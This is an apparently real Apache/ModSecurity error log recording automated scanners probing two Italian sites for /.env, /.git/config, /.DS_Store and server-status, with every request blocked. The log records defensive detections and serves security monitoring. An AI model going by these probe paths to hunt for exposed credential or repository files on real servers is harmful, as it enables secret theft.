[Sat Nov 01 06:33:16.701905 2025] [:error] [pid 3921582] [client 185.177.72.11:54876] [client 185.177.72.11] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQWbnB9l7NL2QvnI7bOj5gAAAAs"]
[Sat Nov 01 06:33:16.703354 2025] [:error] [pid 3921582] [client 185.177.72.11:54876] [client 185.177.72.11] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQWbnB9l7NL2QvnI7bOj5gAAAAs"]
[Sat Nov 01 06:33:16.703533 2025] [:error] [pid 3921582] [client 185.177.72.11:54876] [client 185.177.72.11] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQWbnB9l7NL2QvnI7bOj5gAAAAs"]
[Sat Nov 01 14:59:43.078889 2025] [:error] [pid 3921582] [client 176.65.148.212:48924] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQYSTx9l7NL2QvnI7bOkDAAAAAs"]
[Sat Nov 01 14:59:43.079174 2025] [:error] [pid 3921582] [client 176.65.148.212:48924] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQYSTx9l7NL2QvnI7bOkDAAAAAs"]
[Sat Nov 01 14:59:43.079327 2025] [:error] [pid 3921582] [client 176.65.148.212:48924] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQYSTx9l7NL2QvnI7bOkDAAAAAs"]
[Sat Nov 01 16:19:28.334888 2025] [authz_core:error] [pid 3922697] [client 147.182.149.75:52258] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 01 16:19:29.861517 2025] [:error] [pid 3922691] [client 147.182.149.75:36558] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQYlAaAjPtSezHL3mXebkAAAAAg"]
[Sat Nov 01 16:19:29.861767 2025] [:error] [pid 3922691] [client 147.182.149.75:36558] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQYlAaAjPtSezHL3mXebkAAAAAg"]
[Sat Nov 01 16:19:29.861940 2025] [:error] [pid 3922691] [client 147.182.149.75:36558] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQYlAaAjPtSezHL3mXebkAAAAAg"]
[Sat Nov 01 16:19:30.354332 2025] [:error] [pid 3933628] [client 147.182.149.75:36560] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQYlAo9OSPqeeWqzRENXRgAAAAA"]
[Sat Nov 01 16:19:30.354558 2025] [:error] [pid 3933628] [client 147.182.149.75:36560] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQYlAo9OSPqeeWqzRENXRgAAAAA"]
[Sat Nov 01 16:19:30.354719 2025] [:error] [pid 3933628] [client 147.182.149.75:36560] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQYlAo9OSPqeeWqzRENXRgAAAAA"]
[Sat Nov 01 16:19:30.829260 2025] [:error] [pid 3934124] [client 147.182.149.75:36566] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQYlAjYK0ct8N2rIxviNEQAAAAE"]
[Sat Nov 01 16:19:30.829488 2025] [:error] [pid 3934124] [client 147.182.149.75:36566] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQYlAjYK0ct8N2rIxviNEQAAAAE"]
[Sat Nov 01 16:19:30.829635 2025] [:error] [pid 3934124] [client 147.182.149.75:36566] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQYlAjYK0ct8N2rIxviNEQAAAAE"]
[Sat Nov 01 19:43:48.411444 2025] [authz_core:error] [pid 3937443] [client 165.227.84.14:55758] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 01 19:43:49.395595 2025] [:error] [pid 3937444] [client 165.227.84.14:55786] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQZU5WcJawaLk5raxoZ7sgAAAAE"]
[Sat Nov 01 19:43:49.395805 2025] [:error] [pid 3937444] [client 165.227.84.14:55786] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQZU5WcJawaLk5raxoZ7sgAAAAE"]
[Sat Nov 01 19:43:49.395973 2025] [:error] [pid 3937444] [client 165.227.84.14:55786] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQZU5WcJawaLk5raxoZ7sgAAAAE"]
[Sat Nov 01 19:43:49.690111 2025] [:error] [pid 3937445] [client 165.227.84.14:55792] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQZU5ZZ_XCun2Qc02V-DewAAAAI"]
[Sat Nov 01 19:43:49.690319 2025] [:error] [pid 3937445] [client 165.227.84.14:55792] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQZU5ZZ_XCun2Qc02V-DewAAAAI"]
[Sat Nov 01 19:43:49.690486 2025] [:error] [pid 3937445] [client 165.227.84.14:55792] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQZU5ZZ_XCun2Qc02V-DewAAAAI"]
[Sat Nov 01 19:43:49.977413 2025] [:error] [pid 3936475] [client 165.227.84.14:55802] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQZU5RKlEDzkZg2j-Z_W9gAAAEg"]
[Sat Nov 01 19:43:49.977675 2025] [:error] [pid 3936475] [client 165.227.84.14:55802] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQZU5RKlEDzkZg2j-Z_W9gAAAEg"]
[Sat Nov 01 19:43:49.977841 2025] [:error] [pid 3936475] [client 165.227.84.14:55802] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQZU5RKlEDzkZg2j-Z_W9gAAAEg"]
[Sun Nov 02 06:00:15.542797 2025] [authz_core:error] [pid 3947658] [client 159.65.18.197:41084] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 02 06:00:15.927429 2025] [:error] [pid 3948241] [client 159.65.18.197:41108] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQblX7IujHQHkem11RT5YAAAAAE"]
[Sun Nov 02 06:00:15.927693 2025] [:error] [pid 3948241] [client 159.65.18.197:41108] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQblX7IujHQHkem11RT5YAAAAAE"]
[Sun Nov 02 06:00:15.927856 2025] [:error] [pid 3948241] [client 159.65.18.197:41108] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQblX7IujHQHkem11RT5YAAAAAE"]
[Sun Nov 02 06:00:16.018249 2025] [:error] [pid 3945928] [client 159.65.18.197:41122] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQblYPcml8Ecq5jEXVas0gAAAAY"]
[Sun Nov 02 06:00:16.018529 2025] [:error] [pid 3945928] [client 159.65.18.197:41122] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQblYPcml8Ecq5jEXVas0gAAAAY"]
[Sun Nov 02 06:00:16.018685 2025] [:error] [pid 3945928] [client 159.65.18.197:41122] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQblYPcml8Ecq5jEXVas0gAAAAY"]
[Sun Nov 02 06:00:16.110277 2025] [:error] [pid 3947657] [client 159.65.18.197:41132] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQblYGvyj2FxJHTfZNJ9RAAAAA0"]
[Sun Nov 02 06:00:16.110534 2025] [:error] [pid 3947657] [client 159.65.18.197:41132] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQblYGvyj2FxJHTfZNJ9RAAAAA0"]
[Sun Nov 02 06:00:16.110693 2025] [:error] [pid 3947657] [client 159.65.18.197:41132] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQblYGvyj2FxJHTfZNJ9RAAAAA0"]
[Sun Nov 02 06:00:20.913826 2025] [authz_core:error] [pid 3947657] [client 207.154.197.113:43514] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 02 06:00:21.957578 2025] [:error] [pid 3947652] [client 207.154.197.113:43548] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQblZaXG0mufqACsE6fX5gAAAAg"]
[Sun Nov 02 06:00:21.957814 2025] [:error] [pid 3947652] [client 207.154.197.113:43548] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQblZaXG0mufqACsE6fX5gAAAAg"]
[Sun Nov 02 06:00:21.957973 2025] [:error] [pid 3947652] [client 207.154.197.113:43548] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQblZaXG0mufqACsE6fX5gAAAAg"]
[Sun Nov 02 06:00:22.188832 2025] [:error] [pid 3948242] [client 207.154.197.113:43550] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQblZnJb99echdf8vzojCAAAAAI"]
[Sun Nov 02 06:00:22.189036 2025] [:error] [pid 3948242] [client 207.154.197.113:43550] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQblZnJb99echdf8vzojCAAAAAI"]
[Sun Nov 02 06:00:22.189192 2025] [:error] [pid 3948242] [client 207.154.197.113:43550] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQblZnJb99echdf8vzojCAAAAAI"]
